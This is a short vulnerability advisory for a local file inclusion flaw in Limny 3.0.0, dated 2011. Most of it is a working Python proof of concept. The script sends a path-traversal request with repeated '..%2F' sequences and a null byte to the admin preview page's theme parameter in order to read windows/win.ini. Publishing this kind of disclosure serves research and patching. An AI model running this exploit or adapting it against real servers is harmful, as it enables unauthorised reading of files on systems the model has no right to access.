Limny 3.0.0 Local File Inclusion

# ------------------------------------------------------------------------
# Software................Limny 3.0.0
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://www.limny.org/
# Discovery Date..........1/24/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A local file inclusion vulnerability in Limny 3.0.0 can be exploited
# to include arbitrary files.
# 
# 
# --PoC--

import httplib, urllib
 
host = 'localhost'
path = '/limny-3.0.0'
 
c = httplib.HTTPConnection(host)
c.request('GET', path + '/admin/preview.php?theme=' + '..%2F' * 32 + 'windows/win.ini%00')
r = c.getresponse()
 
print r.status, r.reason
print r.read()